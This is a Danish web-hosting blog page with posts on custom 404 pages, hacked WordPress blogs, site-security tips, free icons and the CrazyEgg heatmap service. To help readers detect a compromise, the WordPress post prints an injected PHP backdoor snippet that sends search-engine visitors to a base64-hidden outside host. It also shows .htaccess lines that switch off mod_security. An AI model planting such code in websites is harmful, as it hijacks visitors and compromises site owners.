Lav din egen 404-fejlside

February 17th, 2009 | Tags: , | 14

404Det sker ofte at en besøgende lander på en side der ikke findes, er flyttet et andet sted hen, eller hvor der blot er tale om en stavefejl. I stedet for at blive mødt af en standard 404-side, kan man nemt selv lave en 404-side.

Trin 1: Lav en .htaccess fil

Hvis du ikke allerede har en .htaccess fil, kan du nemt lave en. åbn en texteditor (fx Notepad) og indsæt denne linie:

ErrorDocument 404 /404.html

Gem derefter filen under navnet “.htaccess” (bemærk det første punktum). “404.html” vil være den fil der vises i tilfælde af en 404 fejl — det kan dog også være en PHP fil, og du kan kalde den hvad du vil (fx “error.html” i stedet for “404.html”). Hvis dit operativsystem ikke er glad for at lade en fil hedde “.htaccess”, kan du kalde den noget andet og omdøbe den efter den er overført til serveren over FTP.

Du kan også lave dine egne sider til andre fejl sider, som fx 403 (Forbidden), 500 (Internal Server Error) osv. Dette vil se sådan ud:

ErrorDocument 403 /403.html
ErrorDocument 500 /500.html

Trin 2: Lav en 404-fil

Lav derefter en side til fejlbeskeden, og læg den eksempelvis i roden af mappen for dit domæne. Benytter du ovenstående eksempler, skal filnavnene være 404.html, 403.html osv. For at gøre 404-siden så effektiv som mulig, så prøv at inkludere nyttefuld information, specielt hvis det drejer sig om større sider og portaler. Fx kan der på en 404-side være:

  • En søgefunktion
  • Link til sitemap eller en hjælpeside
  • Mulighed for at rapportere en mulig fejl

Fejlsider bør som udgangspunkt ikke viderestille til forsiden, specielt uden at brugeren informeres om at der er tale om en side der ikke findes, eller en fejl.

For at din 404-fil skal kunne vises i Internet Explorer, skal den være over 512 bytes i størrelse, ellers viser IE sin egen fejlside.

404 inspiration

Der findes en masse kreative 404 sider, og nogen gør endda en stor del ud af det. Du kan finde masser af inspiration her, her og her.

Sikkerhedsfejl i WordPress fører til mange hackede blogs

June 14th, 2008 | Tags: , , , | 10

Eftersom WordPress bliver mere og mere populært, er blogs drevet af WP mere og mere udsatte for hacker angreb og forsøg på at “hijacke” blogs. Den seneste stykke tid er en lang række blogs blevet overtaget af spammere og hackere, der ikke “overtager” bloggen helt, men lægger skjult kode ind, back-doors, annoncer og specielt links til spam sider.

Selvom WordPress er et af de mest sikre blogging platforme, bliver nye sikkerhedshuller hele tiden fundet (og lappet hurtigst muligt). Husk derfor at altid opdatere med den nyeste version af WordPress.

Hvis du ikke har den seneste udgave af WordPress, 2.5.1, er der stor sandsynlighed for at din side er hacket, selvom alt virker som det skal. Det sker ofte at der er lagt en backdoor ind, så hackeren har adgang til din blog, samt din adgangskode også kendes af hackeren. Vi anbefaler at du:

  • Opgraderer WordPress med det samme
  • Opdaterer din adgangskode

Kig efter skjult kode

Tjek derefter grundigt alle filer i det WordPress tema du bruger, da disse ikke bliver opgraderet. Det er som regel her at skjult kode bliver lagt ind, hovedsageligt med kommandoerne eval() og base64_decode(). Kig efter kode der ser sådan ud, som regel i din header.php:

< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol",
"cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }? >

Hackere bruger kode som denne (mere kode her) for at lægge skjulte links ind på din side, der ikke kan ses af dem der besøger siden, men kun af søgemaskinerne. Tjek derfor alle filer for kode og specielt links der ikke burde være der.

Tjek din htaccess

Der er også fundet eksempler på at hackere bruger .htaccess til at få adgang til WP-Admin. Åbn din .htaccess fil, som ligger i din WordPress folder. Hvis der ikke er ændret noget, skal den se sådan ud:

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [ L]
# END WordPress

Denne kode kan også være der:
< ifmodule mod_security.c>
< files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
< /files>
< /ifmodule>

Hvis der er anden kode end det du har tilføjet det, er det bedst at du opdaterer alle dine WordPress filer (inklusive .htaccess, selvfølgeligt).

Fjern WP version fra meta tags

WordPress blogs bliver automatisk scannet af hackere efter version, på den måde er det nemmere at finde, og hacke, gamle blogs. WordPress bruger en meta tag til at vise hvilken version det er, der ser sådan ud:

< meta content="WordPress <?php bloginfo(’version’); ? />" name="generator" />

Du kan med fordel fjerne denne kode fra din header.php.

Flere tips

  • Begræns adgang til din wp-admin folder med .htacces, læs hvordan her.
  • Læg en tom index.html fil i din plugins folder, for at skjule hvilke plugins du bruger. Alternativ kan du bruge en index.php fil der viderestiller til din blog, læg < ?php header("Location: http://www.ditdomæne.dk");?> i en index.php fil og upload den.
  • Brug plugins som WP Security Scan for at teste sikkerheden.
  • Og til sidst, brug altid den seneste WordPress version, brug sikre adgangskoder, og husk altid at tage backup

Til sidst kan du læse om blogs der er blevet udsat for hacking, og deres erfaringer. Læs her, her, her, og her.

Sådan undgår du at blive hacket

April 8th, 2008 | Tags: , , | 11

Et par Gigahost kunder har i de sidste par dage oplevet at deres sider er blevet hacket, i de fleste tilfælde af “Muslem Hacker” eller “Saudi Arabian hacker”. På grund af visse tegninger er danske websider mere udsatte i disse dage. Her er et par sikkerhedstips til din side.

  • Adgangskoder: Husk altid at have ordentlige adgangskoder til dine systemer, og brug aldrig dit brugernavn eller navn som adgangskode til dit webhotel, mail osv. Alternativt kan du bruge password-generatorer som fx denne her.
  • CMS og scripts: Opdater altid dit CMS og scripts til de nyeste versioner, da nye sikkerhedshuller findes (og lappes) regelmæssigt.
  • Slet unødvendige filer: Slet filer og scripts du ikke bruger, specielt installationsfiler fra CMS-installationer, der som regel hedder “install.php” eller “setup.php”.
  • Brug robots.txt: Søgemaskiner indekserer normalt al indhold på din side, men ved at placere en robots.txt fil kan du specificere hvad der skal indekseres, og hvad der ikke skal. Læs hvordan du gør her.
  • Beskyt med .htaccess: Du kan bruge .htaccess til at password-beskytte visse dele af din side, blokere adgang fra visse IP-adresser, blokere for hot-linking af billeder og meget andet. Læs mere her, og en WordPress-specifik .htaccess guide kan findes her.
  • Plugins og tredjepartsprogrammer: Hvis du bruger 3. parts plugins eller scripts til dit CMS, fx WordPress plugins, er det altid en god ide at opdatere til de nyeste versioner. Husk også kun at downloade plugins og scripts fra officielle kilder.
  • Brug antivirus/antispyware: Brug antivirus og antispyware programmer til at beskytte din PC, da dine adgangskoder nemt kan tilgås via spyware programmer. Et godt og gratis antivirus program er AVG, og mod spyware, og ligeledes gratis, anbefaler vi Ad-Aware.
  • Backup: Til sidst skal du altid huske at tage backup af dine filer og database – specielt når du opdaterer dit CMS eller dine scripts.

Gratis ikoner til din hjemmeside

July 20th, 2007 | Tags: , | 2


Websiteicons.net har en samling af tonsvis af gratis ikoner til din hjemmeside. Der er desuden mange andre samlinger rundt omkring på nettet (fx her, her, og her). Alternativt kan man bruge en søgemaskine som IconFinder eller Iconlet. Har du andre links er du velkommen til at dele dem i kommentar sektionen.

CrazyEgg Heatmap Stats

August 21st, 2006 | Tags: | 1

untitled-2.jpgCrazyEgg er et nyt program der viser en heatmap over en given hjemmeside, hvad folk klikker (banner, link osv.) og generel bruger aktivitet. Den virker ved at man installerer et script, der så sender information til din CrazyEgg konto.

Du kan selv bestemme om din hjemmeside skal testes i en dag, en uge eller en hel måned, og derefter generes en rapport af resultatet. Det koster fra $19 om måneden (og op til $99), men der er en gratis version hvor de første 5000 brugere bliver registreret i løbet af en måned.

En god måde at få overblik over din hjemmeside, hvad folk er interesseret i, og tilpasse den derefter.